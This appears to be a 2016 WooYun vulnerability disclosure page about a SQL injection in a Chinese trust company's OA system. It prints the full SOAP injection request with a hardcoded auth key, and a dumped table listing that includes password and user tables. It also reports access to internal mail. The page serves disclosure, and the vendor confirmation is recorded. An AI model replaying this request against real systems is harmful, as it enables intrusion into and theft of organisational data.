国元信托某站SQL注入/大量信息泄露/可进入其他系统 | wooyun-2016-0213972

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2016-0213972

漏洞标题：

国元信托某站SQL注入/大量信息泄露/可进入其他系统

漏洞详情

披露状态：

2016-05-29：细节已通知厂商并且等待厂商处理中
2016-05-31：厂商已经确认，细节仅向厂商公开
2016-06-10：细节向核心白帽子及相关领域专家公开
2016-06-20：细节向普通白帽子公开
2016-06-30：细节向实习白帽子公开
2016-07-15：细节向公众公开

简要描述：

详细说明：

国元信托oa：http://**.**.**.**:7001/defaultroot/login.jsp
注入点：*号处

POST http://**.**.**.**:7001/defaultroot/xfservices/GeneralWeb HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 463
Host: **.**.**.**:7001
Proxy-Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
<soapenv:Envelope xmlns:soapenv="http://**.**.**.**/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">
   <soapenv:Header/>
   <soapenv:Body>
      <gen:OAManager>
         <gen:input>&lt;root&gt;&lt;key&gt;auth.key.whir2012&lt;/key&gt;&lt;cmd&gt;syncUserList&lt;/cmd&gt;&lt;domain&gt;1*--&lt;/domain&gt;&lt;/root&gt;</gen:input>
      </gen:OAManager>
   </soapenv:Body>
</soapenv:Envelope>

Database: EZOFFICE
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| SECURITY_LOG                   | 648684  |
| OA_INFORMATIONSTATISTICS       | 632866  |
| OA_INFORMATIONBROWSER          | 434800  |
| WF_DEALWITHLOG                 | 32484   |
| WF_PROCEEDTRANSITION           | 26185   |
| WF_PROCEEDACTIVITY             | 25161   |
| OA_INFORMATION                 | 23817   |
| WF_PROCEEDTR                   | 22593   |
| WF_WORK                        | 20605   |
| OA_INFORMATIONACCESSORY        | 15978   |
| WF_DEALWITHCOMMENT             | 13968   |
| WF_DEALWITH                    | 12238   |
| DOCUMENT_SIGNATURE             | 11367   |
| OA_ALLATTACH                   | 9610    |
| SYS_EXPORT_SCHEMA_08           | 8288    |
| SYS_EXPORT_SCHEMA_06           | 8267    |
| SYS_EXPORT_SCHEMA_05           | 8256    |
| SYS_EXPORT_SCHEMA_04           | 8244    |
| SYS_EXPORT_SCHEMA_03           | 8234    |
| SYS_EXPORT_SCHEMA_01           | 8217    |
| ORG_TMPPASSWORD                | 7176    |
| OA_MAIL_USER                   | 6937    |
| EZ_FLOW_ACTION_LOG             | 6929    |
| EZ_BPMPOOL_PROCINST            | 4689    |
| EZ_FLOW_HI_ACTINST             | 4385    |
| WF_PROCEEDFLOW                 | 4287    |
| DOCUMENT                       | 3882    |
| DOCUMENT_FILE                  | 3762    |
| OA_MAILINTERIOR                | 3539    |
| OA_ANSWERSHEETOPTION           | 3054    |
| EZ_FLOW_HI_TASKINST            | 2956    |
| OA_DISTRICT                    | 2476    |
| SYS_EXPORT_SCHEMA_07           | 2371    |
| WHIR$CITY                      | 2232    |
| WF_READWRITECONTROL            | 2203    |
| EZ_FLOW_RE_COMMENT             | 2102    |
| OA_INFORMATIONHISTORY          | 2079    |
| WHIR$T3011                     | 1950    |
| OA_INFORPERSONALSTAT           | 1876    |
| EXPORT000002                   | 1772    |
| OA_ANSWERSHEETCONTENT          | 1558    |
| OA_INFORORGSTAT                | 992     |
| ORG_SYNCRTX                    | 941     |
| EZ_FLOW_RU_VARIABLE            | 847     |
| ORG_RIGHTSCOPE                 | 839     |
| WHIR$T3013                     | 800     |
| OA_THEMEOPTION                 | 780     |
| OA_INFORHISTORYACCESSORY       | 761     |
| EZ_FLOW_HI_PROCINST            | 742     |
| OA_MAILACCESSORY               | 728     |
| WHIR$T3023                     | 627     |
| TELT                           | 515     |
| EZ_FORM_FIELD                  | 510     |
| OA_VOITUREAPPLY                | 510     |
| OA_PASSWORD_HISTORY            | 503     |
| EZ_FLOW_GE_BYTEARRAY           | 471     |
| TFIELD                         | 400     |
| GOV_RECEIVEFILE                | 393     |
| OA_PATCHINFO                   | 377     |
| WF_IMMOBILITYFIELD             | 370     |
| WF_TRANSITIONRESTRICTION       | 367     |
| ZL_USER_INFO                   | 281     |
| ORG_RIGHT                      | 269     |
| WF_TRANSITION                  | 249     |
| WF_ACTIVITY                    | 245     |
| ORG_EMPLOYEE                   | 216     |
| ORG_ORGANIZATION_USER          | 214     |
| WHIR$COUNTRY                   | 210     |
| EZ_SECU_ERRORCLIENT            | 205     |
| ORG_ROLE_RIGHT                 | 200     |
| OA_SYSTEM_REMIND               | 188     |
| HR_RPT_INIT_FIELD              | 183     |
| SECURITY_LOGOIN_ERROR          | 182     |
| GOV_SENDDOCUMENTUPDATE         | 179     |
| WHIR$T3010                     | 155     |
| EZ_FLOW_DE_ACTIVITY            | 144     |
| EZ_FLOW_RE_DEPLOYMENT          | 135     |
| EZ_FLOW_RE_PROCDEF             | 135     |
| EZ_SECU_PAGELIST               | 124     |
| OA_INFORMATIONCHANNEL          | 119     |
| OA_QUESTHEME                   | 119     |
| EMPLOYEE_20110217145223SCOPE   | 118     |
| EMPLOYEE_20110217150839SCOPE   | 118     |
| OA_ANSWERSHEET                 | 116     |
| HR_S_GZXM                      | 100     |
| GOV_CUSTOM_CHECKFIELD          | 98      |
| BOOKMARKS                      | 94      |
| EZ_FLOW_RU_EXECUTION           | 90      |
| GOV_CUSTOM_FIELD               | 87      |
| WHIR$T3024                     | 87      |
| OA_CUSTMENU                    | 81      |
| WHIR$T3015                     | 80      |
| OA_PORTAL_PORTLET_SETTING      | 76      |
| WHIR$T3025                     | 75      |
| OA_PORTAL_PORTLET              | 73      |
| OA_MENUSET                     | 68      |
| TSHOW                          | 67      |
| WF_GRAPH_UNIT                  | 59      |
| EZ_BPMPOOL_PROCESSPACKAGE      | 56      |
| SECURITY_LOG_MODULE            | 56      |
| WF_PACKAGE                     | 56      |
| ORG_USER_ROLE                  | 55      |
| EZ_BPMPOOL_PROCESS             | 54      |
| GOV_DOCUMENTSENDFILE           | 53      |
| OA_PERSONOA_USER_PRESS_RELATIO | 53      |
| OA_INFORMATIONCOMMENT          | 51      |
| ORG_LOGINPAGESETTAB            | 51      |
| TAREA                          | 50      |
| ORG_USER_GROUP                 | 46      |
| TPAGE                          | 46      |
| EZ_FORM_TABLE                  | 44      |
| WHIR$T3032                     | 44      |
| EZ_FORM                        | 40      |
| OA_WORKLOG                     | 40      |
| WF_NEEDFLOWMODULE              | 40      |
| OA_NETDISK_FILE                | 39      |
| OA_OFFICALDICTION              | 39      |
| WHIR$T3009                     | 38      |
| EZ_BPMPOOL_PROCESS_STARTUSER   | 37      |
| WF_IMMOBILITYFORM              | 37      |
| WF_WORKFLOW_DESIGNER           | 37      |
| TTABLE                         | 34      |
| WHIR$PROVINCE                  | 34      |
| OA_PORTAL_LAYOUT_PORTLET       | 32      |
| EZ_FLOW_DE_DESIGFORM           | 28      |
| EZ_FLOW_DE_DESIGNER            | 28      |
| EZ_FLOW_RE_PACK_PDE            | 28      |
| ORG_ORGANIZATION               | 28      |
| TEMPLATE_BOOKMARKS             | 28      |
| EZ_BPMPOOL_PROCESS_STARTORG    | 27      |
| WF_DEALWITHCOMMENT_DRAFT       | 27      |
| WF_WORKFLOWPROCESS             | 27      |
| CUSTOMER_CENTER                | 26      |
| OA_PERSONOA_PRESS              | 26      |
| EZ_FLOW_RU_TASK                | 25      |
| OA_INFORMATION_PRINT           | 25      |
| EVO_WEIXIN_ORGMAP              | 24      |
| OA_DUTY                        | 24      |
| OA_PORTAL_LAYOUT               | 24      |
| WF_WORKFLOWWRITECONTROL        | 24      |
| WF_OA_RELATEFIELD              | 22      |
| OA_INFORMATION_DEPARTMENT_XML  | 21      |
| EZ_FORM_PRINT                  | 20      |
| OA_EVENTATTENDER               | 20      |
| SITE_RIGHT                     | 20      |
| WHIR$T3040                     | 19      |
| OA_BOARDROOM_PERSONS           | 17      |
| ORG_20110217150839             | 16      |
| ORG_ROLE                       | 16      |
| GOV_SENDDOCUMENTTOPICAL        | 15      |
| WHIR$T3031                     | 15      |
| MS_MODEL                       | 14      |
| OA_RELATIONMODULE              | 14      |
| OA_PORTAL_TYPE                 | 13      |
| DOCUMENT_HISTORY               | 12      |
| GOV_DOCUMENTUNIT               | 12      |
| OA_PERSONAL_POSITIONS          | 12      |
| TMODEL                         | 12      |
| EZ_BPMPOOL_RELATIONPROCESS     | 11      |
| OA_EVENT                       | 11      |
| OA_GRAPHREPORT                 | 11      |
| OA_GRAPHREPORT_TYPE            | 11      |
| OA_VOITURE                     | 11      |
| WHIR$T3026                     | 11      |
| HR_S_INCOME_TAX                | 9       |
| OA_BOARDROOM_EXECUTESTATUS     | 9       |
| OA_EXT_TABLE                   | 9       |
| OA_MENU                        | 9       |
| OA_PORTAL_TEMPLATE             | 9       |
| TAREATYPE                      | 9       |
| WF_OLDCOMMENTLOG               | 9       |
| WHIR$T3028                     | 9       |
| HR_S_RATIO_SETTING             | 8       |
| OA_BDROOMAPPTYPE               | 8       |
| OA_INFORMATIONSTATISTICSTYPE   | 8       |
| ORG_GROUP                      | 8       |
| WF_RU_REMINDINFO               | 8       |
| WHIR$T3020                     | 8       |
| GOV_RECEIVEFILENUMSEQ          | 7       |
| GOV_RECEIVEFILESEQ             | 7       |
| OA_EMPLOYEE_STATUS             | 7       |
| OA_EXT_SHOW                    | 7       |
| OA_PERSONONDUTY                | 7       |
| OA_RELATIONOBJECT              | 7       |
| OA_STATUS_DETAIL               | 7       |
| TEMPLATE_FILE                  | 7       |
| WF_RELATIONPROCESS             | 7       |
| WHIR$T3018                     | 7       |
| GOV_SENDDOCUMENTNUM            | 6       |
| GOV_SENDDOCUMENTWORD           | 6       |
| OA_MATURITY_ALERT_SETTINGS     | 6       |
| OA_QUESTIONNAIRE               | 6       |
| ORG_EMPLOYEE_EDUSTORY          | 6       |
| ORG_SIDELINE                   | 6       |
| EMPLOYEE_20110217145223ROLE    | 5       |
| EMPLOYEE_20110217150839ROLE    | 5       |
| EZ_FORM_MODULE                 | 5       |
| LDAPSET                        | 5       |
| OA_DEPARTMENTSTYLE             | 5       |
| OA_INFORMATIONLUCENETEMP       | 5       |
| OA_SYSDICT                     | 5       |
| SIGNATURE                      | 5       |
| SYS_CORP_SET_APP               | 5       |
| SYS_EXPORT_SCHEMA_02           | 5       |
| WHIR$T3016                     | 5       |
| WHIR$T3022                     | 5       |
| WHIR$T3027                     | 5       |
| EZ_BPMPOOL_COMMONPROCESS       | 4       |
| HR_RPT_SHOW_FIELD              | 4       |
| MS_INFOFLOW                    | 4       |
| OA_EXT_TYPE                    | 4       |
| OA_PORTAL_PORTLET_FILE         | 4       |
| OA_TASK                        | 4       |
| OA_TASKEXEC                    | 4       |
| OA_TASKVIEW                    | 4       |
| TTYPE                          | 4       |
| EZ_FLOW_GE_PROPERTY            | 3       |
| GJ_EMPCHANGETYPE               | 3       |
| GOV_CUSTOM_DOCUMNET            | 3       |
| OA_DOSSIER_GDSET               | 3       |
| SECURITY_ONLINEUSER            | 3       |
| UNION_TASKFROM                 | 3       |
| USER_ORG_SYN_ERRLOG            | 3       |
| ZL_ORG_INFO                    | 3       |
| EMPLOYEE_20110217145223        | 2       |
| EMPLOYEE_20110217150839        | 2       |
| EZ_FLOW_RU_PROCDRAFT           | 2       |
| HR_DEPT_KIND                   | 2       |
| HR_PERSON_TYPE                 | 2       |
| LDAPACCOUNTS                   | 2       |
| OA_BOARDROOM                   | 2       |
| OA_CARDEMPINFO                 | 2       |
| OA_CUSTOMDESKTOPLAYOUT         | 2       |
| OA_FORUM                       | 2       |
| OA_FORUMCLASS                  | 2       |
| OA_NOTEPAPER                   | 2       |
| OA_PERSONALSTAT                | 2       |
| OA_SYSTEM_USERMODULE           | 2       |
| OA_TRAINCLASS                  | 2       |
| TLIMIT                         | 2       |
| TSEQ                           | 2       |
| VERSION_FILE                   | 2       |
| WEIBO_USER                     | 2       |
| WF_WORK_ACCESSORY              | 2       |
| WHIR$T3030                     | 2       |
| WHIR$T3041                     | 2       |
| EMPLOYEE_20110217145223USER    | 1       |
| EMPLOYEE_20110217150839USER    | 1       |
| EZ_BPMPOOL_PROCESS_STARTGROUP  | 1       |
| GJ_DRAWDEPT                    | 1       |
| GJ_GOODS                       | 1       |
| GJ_GOODSTYPE                   | 1       |
| GJ_PTDETAIL                    | 1       |
| GJ_PTMASTER                    | 1       |
| GJ_STOCK                       | 1       |
| GJ_STOCK_GOODSTYPE             | 1       |
| GJ_SUPPLYUNIT                  | 1       |
| GOV_DOCUMENTFILETYPE           | 1       |
| GOV_RECEIVEDOCUMENTBASEINFO    | 1       |
| GOV_SENDDOCUMENTBASEINFO       | 1       |
| GOV_SENDFILE_USER              | 1       |
| HR_RPT_SOLUTION                | 1       |
| HR_S_FFFS_SETTING              | 1       |
| OA_BOARDROOM_MEETINGTIME       | 1       |
| OA_BOARDROOMAPPLY              | 1       |
| OA_BOOKS                       | 1       |
| OA_BOOKSTYPE                   | 1       |
| OA_DIARYCLASS                  | 1       |
| OA_INFORMATIONTAG              | 1       |
| OA_LIBRARY                     | 1       |
| OA_MAIL_H_SET                  | 1       |
| OA_ORGWRAP                     | 1       |
| OA_PERSONSETUP                 | 1       |
| OA_PORTAL_MENU_SETTING         | 1       |
| OA_RECORDTYPE                  | 1       |
| OA_SEQ                         | 1       |
| OA_SYS_MAILREMIND              | 1       |
| OA_TASKHISTORY                 | 1       |
| OA_TASKREMIND                  | 1       |
| OA_TRAINRECORD                 | 1       |
| OA_UNITINFO                    | 1       |
| OA_VOITUREAUDITING             | 1       |
| OA_VOITURETYPE                 | 1       |
| OA_WF_OVERDATE                 | 1       |
| OA_WF_WORKDATE                 | 1       |
| OA_WORKADDRESS_TYPE            | 1       |
| OACONSOLE_MANAGER              | 1       |
| ORG_20110217145223             | 1       |
| ORG_20110217145223USER         | 1       |
| ORG_20110217150839USER         | 1       |
| ORG_DOMAIN                     | 1       |
| ORG_GROUP_CLASS                | 1       |
| ORG_MANAGER                    | 1       |
| ORG_ROLE_CLASS                 | 1       |
| SECURITY_DOG                   | 1       |
| SECURITY_IP                    | 1       |
| SITE_MANAGER                   | 1       |
| SYS_CORP_SET                   | 1       |
| WH_APPEND                      | 1       |
+--------------------------------+---------+

登录后，可以看到内部邮件以及其他的集成系统，所以危害还是蛮大的

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-05-31 17:45

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源路人甲@乌云